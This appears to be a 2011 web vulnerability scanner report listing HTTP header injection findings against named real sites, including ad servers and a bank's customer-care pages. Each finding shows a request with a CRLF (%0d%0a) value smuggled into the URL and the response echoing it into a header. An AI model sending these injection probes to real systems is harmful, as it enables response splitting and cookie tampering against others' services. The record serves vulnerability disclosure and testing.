Host: | http://ad.doubleclick.net |
Path: | /jump/N884.AccuWeather |
GET /3f3a1%0d%0a3af708ef023/N884.AccuWeather Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/3f3a1 3af708ef023/N884.AccuWeather Date: Thu, 03 Feb 2011 19:03:41 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /jump/N884.AccuWeather |
GET /5a6e8%0d%0a73f07475f21/N884.AccuWeather Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5a6e8 73f07475f21/N884.AccuWeather Date: Thu, 03 Feb 2011 19:03:42 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /jump/N884.AccuWeather |
GET /27833%0d%0a886ea4e3f1b/N884.AccuWeather Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/27833 886ea4e3f1b/N884.AccuWeather Date: Thu, 03 Feb 2011 19:03:42 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /jump/N884.AccuWeather |
GET /593ee%0d%0afae69de04e9/N884.AccuWeather Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/593ee fae69de04e9/N884.AccuWeather Date: Thu, 03 Feb 2011 19:03:46 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /jump/locm.pp |
GET /8e548%0d%0a0b5406658fb/locm.pp HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/8e548 0b5406658fb/locm.pp: Date: Thu, 03 Feb 2011 16:08:51 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /jump/locm.sp |
GET /4cb86%0d%0a56daa9c4c90/locm.sp HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/4cb86 56daa9c4c90/locm.sp: Date: Thu, 03 Feb 2011 16:08:45 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /jump/locm.sp/retail |
GET /2c034%0d%0a52d83d7cc34/locm.sp/retail_banks Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2c034 52d83d7cc34/locm.sp/retail_banks Date: Thu, 03 Feb 2011 16:08:49 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | https://ad.doubleclick |
Path: | /activity |
GET /activity;src=2549153 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: https://ad.doubleclick cf3d6eb0e23=1&_dc_ck=try: Set-Cookie: test_cookie=CheckFor P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Thu, 03 Feb 2011 13:17:55 GMT Server: GFE/2.0 Content-Type: text/html Connection: close |
Severity: | High |
Confidence: | Certain |
Host: | https://ad.doubleclick |
Path: | /activity |
GET /activity;src=1c6ea%0d%0a39d8322a44 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: https://ad.doubleclick 39d8322a44&_dc_ck=try: Set-Cookie: test_cookie=CheckFor P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Thu, 03 Feb 2011 13:17:54 GMT Server: GFE/2.0 Content-Type: text/html Connection: close |
Severity: | High |
Confidence: | Certain |
Host: | http://bs.serving-sys.com |
Path: | /BurstingPipe/Banner |
GET /BurstingPipe/Banner Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eyeblaster=BWVal=&BWDate= |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 0 Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Set-Cookie: eyeblaster=BWVal=&BWDate= 039b9159693; expires=Wed, 04-May-2011 14: 04:16 GMT; domain=bs.serving-sys.com Set-Cookie: u2=af46648c-e211-44c6 P3P: CP="NOI DEVa OUR BUS UNI" Date: Thu, 03 Feb 2011 19:04:16 GMT Connection: close |
Severity: | High |
Confidence: | Certain |
Host: | http://bs.serving-sys.com |
Path: | /BurstingPipe/Banner |
GET /BurstingPipe/Banner Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eyeblaster=BWVal=&BWDate= |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 0 Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Set-Cookie: eyeblaster=BWVal=&BWDate= ec9ed734f69; expires=Wed, 04-May-2011 14: 04:15 GMT; domain=bs.serving-sys.com Set-Cookie: u2=af46648c-e211-44c6 Set-Cookie: C_=BlankImage P3P: CP="NOI DEVa OUR BUS UNI" Date: Thu, 03 Feb 2011 19:04:14 GMT Connection: close |
Severity: | High |
Confidence: | Certain |
Host: | http://bs.serving-sys.com |
Path: | /BurstingPipe/adServer.bs |
GET /BurstingPipe/adServer.bs Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: u3=1; C4=; ActivityInfo=000p81bBo%5f |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding Set-Cookie: eyeblaster=BWVal=408 3b29ba82741; expires=Wed, 04-May-2011 13: 53:46 GMT; domain=bs.serving-sys.com Set-Cookie: A3=h5j3abNz07l00000 Set-Cookie: B3=89PS000000000QsZ7 Set-Cookie: u2=1b39b065-3668-4ab4 P3P: CP="NOI DEVa OUR BUS UNI" Date: Thu, 03 Feb 2011 18:53:46 GMT Connection: close Content-Length: 1881 var ebPtcl="http://";var ebBigS="ds.serving-sys ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://bs.serving-sys.com |
Path: | /BurstingPipe/adServer.bs |
GET /BurstingPipe/adServer.bs Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net Origin: http://ad.doubleclick.net Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding Set-Cookie: u2=43909ba7-724d-4dce Set-Cookie: eyeblaster=BWVal=&BWDate= eb4b41840dc&RES=128&WMPV=0; expires=Wed, 04-May-2011 13: 53:45 GMT; domain=bs.serving-sys.com P3P: CP="NOI DEVa OUR BUS UNI" Date: Thu, 03 Feb 2011 18:53:45 GMT Connection: close Content-Length: 0 |
Severity: | High |
Confidence: | Certain |
Host: | http://bs.serving-sys.com |
Path: | /BurstingPipe/adServer.bs |
GET /BurstingPipe/adServer.bs Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net Origin: http://ad.doubleclick.net Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding Set-Cookie: u2=ca112895-8f52-433d Set-Cookie: eyeblaster=BWVal=&BWDate= 3da8f15de52&WMPV=0; expires=Wed, 04-May-2011 13: 53:46 GMT; domain=bs.serving-sys.com P3P: CP="NOI DEVa OUR BUS UNI" Date: Thu, 03 Feb 2011 18:53:45 GMT Connection: close Content-Length: 0 |
Severity: | High |
Confidence: | Certain |
Host: | http://bs.serving-sys.com |
Path: | /BurstingPipe/adServer.bs |
GET /BurstingPipe/adServer.bs Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net Origin: http://ad.doubleclick.net Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding Set-Cookie: u2=d3701055-7b90-43e3 Set-Cookie: eyeblaster=BWVal=&BWDate= 4e44e1eb37; expires=Wed, 04-May-2011 13: 53:46 GMT; domain=bs.serving-sys.com P3P: CP="NOI DEVa OUR BUS UNI" Date: Thu, 03 Feb 2011 18:53:45 GMT Connection: close Content-Length: 0 |
Severity: | High |
Confidence: | Certain |
Host: | http://c7.zedo.com |
Path: | /bar/v16-401/c5/jsc/fm.js |
GET /bar/v16-401/c5/jsc/fm.js Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDA=INmz6woBADYA |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1220:aabf4 30b9c2776ab;expires=Fri, 04 Feb 2011 05: 00:00 GMT;domain=.zedo.com;path Set-Cookie: FFcat=1220,175,14:1220 Set-Cookie: FFad=0:0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path ETag: "419234-82a5-4988a5a Vary: Accept-Encoding X-Varnish: 1882666994 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=132 Expires: Thu, 03 Feb 2011 16:12:04 GMT Date: Thu, 03 Feb 2011 16:09:52 GMT Connection: close Content-Length: 2491 // Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat=',aabf4 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://c7.zedo.com |
Path: | /bar/v16-401/c5/jsc/fmr |
GET /bar/v16-401/c5/jsc/fmr Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDA=INmz6woBADYA |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1220:ca6b6 b451cec5ae0;expires=Fri, 04 Feb 2011 05: 00:00 GMT;domain=.zedo.com;path Set-Cookie: FFcat=1220,175,9;expires Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path ETag: "86257539-809a-4988a Vary: Accept-Encoding X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=125 Expires: Thu, 03 Feb 2011 16:12:04 GMT Date: Thu, 03 Feb 2011 16:09:59 GMT Connection: close Content-Length: 2492 // Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat=',ca6b6 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://customercare |
Path: | /guides/bus_services.asp |
GET /63309%0d%0a7cae529033e/bus_services.asp HTTP/1.1 Host: customercare.suntrust.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 13:40:25 GMT Connection: close Location: /Guides/404.html?404;http 7cae529033e/bus_services.asp |
Severity: | High |
Confidence: | Certain |
Host: | https://customercare |
Path: | /guides/contact_us.asp |
GET /ac2d3%0d%0ac45a5b7ea59/contact_us.asp HTTP/1.1 Host: customercare.suntrust.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 13:40:18 GMT Connection: close Location: /Guides/404.html?404;http c45a5b7ea59/contact_us.asp |
Severity: | High |
Confidence: | Certain |
Host: | https://customercare |
Path: | /guides/credit_cards.asp |
GET /c1afa%0d%0ab3b66e981f0/credit_cards.asp HTTP/1.1 Host: customercare.suntrust.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 14:22:06 GMT Connection: close Location: /Guides/404.html?404;http b3b66e981f0/credit_cards.asp |
Severity: | High |
Confidence: | Certain |
Host: | https://customercare |
Path: | /guides/deposits.asp |
GET /b116f%0d%0a7994da7a583/deposits.asp HTTP/1.1 Host: customercare.suntrust.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 14:22:05 GMT Connection: close Location: /Guides/404.html?404;http 7994da7a583/deposits.asp |
Severity: | High |
Confidence: | Certain |
Host: | https://customercare |
Path: | /guides/marine_lending |
GET /c2767%0d%0aa8e07e5183f/marine_lending.asp HTTP/1.1 Host: customercare.suntrust.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 14:22:07 GMT Connection: close Location: /Guides/404.html?404;http a8e07e5183f/marine_lending.asp |
Severity: | High |
Confidence: | Certain |
Host: | https://customercare |
Path: | /guides/merchant_services |
GET /4a3d1%0d%0a704833da91d/merchant_services.asp HTTP/1.1 Host: customercare.suntrust.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 14:22:02 GMT Connection: close Location: /Guides/404.html?404;http 704833da91d/merchant_services.asp |
Severity: | High |
Confidence: | Certain |
Host: | https://customercare |
Path: | /guides/mort_services.asp |
GET /9cb1a%0d%0a923c4ef6e41/mort_services.asp HTTP/1.1 Host: customercare.suntrust.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 14:22:09 GMT Connection: close Location: /Guides/404.html?404;http 923c4ef6e41/mort_services.asp |
Severity: | High |
Confidence: | Certain |
Host: | http://tacoda.at.atwola |
Path: | /rtx/r.js |
GET /rtx/r.js?cmd=PFZ&si Host: tacoda.at.atwola.com Proxy-Connection: keep-alive Referer: http://pbid.pro-market Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ATTACID=a3Z0aWQ9MTZp |
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:04:36 GMT Server: Apache/1.3.37 (Unix) mod_perl/1.29 P3P: policyref="http://www P3P: policyref="http://www Cache-Control: max-age=900 Expires: Thu, 03 Feb 2011 16:19:36 GMT Set-Cookie: ANRTT=50213^1^1296913131 Set-Cookie: Tsid=0^1296748802 Set-Cookie: TData=99999|^|50012|51133 Set-Cookie: Anxd=x; expires=Thu, 03-Feb-11 22:04:36 GMT; path=/; domain=tacoda.at.atwola Set-Cookie: N=2:22cab0f9b4ce99c1 d5802bb2bc3,22cab0f9b4ce99c1d3d Set-Cookie: ATTAC=a3ZzZWc9OTk5OT ntCoent-Length: 260 Content-Type: application/x-javascript Content-Length: 260 var ANUT=1; var ANOO=0; var ANSR=1; var ANTID='16if17a0kq0bgd'; var ANSL='99999|^|50012|51133 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tacoda.at.atwola |
Path: | /rtx/r.js |
GET /rtx/r.js?cmd=PFZ&si=e86db%0d%0a2247350a294&pi=H&xs=1&pu=http%253A/ Host: tacoda.at.atwola.com Proxy-Connection: keep-alive Referer: http://pbid.pro-market Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ATTACID=a3Z0aWQ9MTZp |
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:03:36 GMT Server: Apache/1.3.37 (Unix) mod_perl/1.29 P3P: policyref="http://www P3P: policyref="http://www Cache-Control: max-age=900 Expires: Thu, 03 Feb 2011 16:18:36 GMT Set-Cookie: ANRTT=50213^1^1296913131 Set-Cookie: Tsid=0^1296748802 2247350a294^1296749016^1296750816; path=/; expires=Thu, 03-Feb-11 16:33:36 GMT; domain=tacoda.at.atwola Set-Cookie: TData=99999|^|50012|51133 Set-Cookie: Anxd=x; expires=Thu, 03-Feb-11 22:03:36 GMT; path=/; domain=tacoda.at.atwola Set-Cookie: N=2:22cab0f9b4ce99c1 Set-Cookie: ATTAC=a3ZzZWc9OTk5OT Cteonnt-Length: 92 Content-Type: application/x-javascript Content-Length: 92 var ANUT=1; var ANOO=0; var ANSR=0; var ANTID='16if17a0kq0bgd'; var ANSL; ANRTXR(); |
Severity: | High |
Confidence: | Certain |
Host: | http://www.supermedia.com |
Path: | /business-listings |
GET /business-listings Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 17:05:35 GMT Set-Cookie: JSESSIONID=45AE3CAD7 Set-Cookie: trafficSource="68d81 4d208d5e6db"; Expires=Sat, 05-Mar-2011 17:05:33 GMT; Path=/ Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 17:05:33 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close Set-Cookie: NSC_xxx-tvqfsnfejb-dpn <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head> <title>Your Business Profile | SuperMedia.com Advertising</title> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.supermedia.com |
Path: | /spportal/spportalFlow.do |
GET /spportal/spportalFlow.do3e3db%0d%0ab735c4f3a4c?fromPage=login&_flowId Host: www.supermedia.com Proxy-Connection: keep-alive Referer: http://www.supermedia.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=B97B42F53 |
HTTP/1.1 302 Moved Temporarily Server: Unspecified Date: Thu, 03 Feb 2011 19:12:37 GMT Location: https://www.supermedia b735c4f3a4c?fromPage=login&_flowId Content-Length: 0 Connection: close |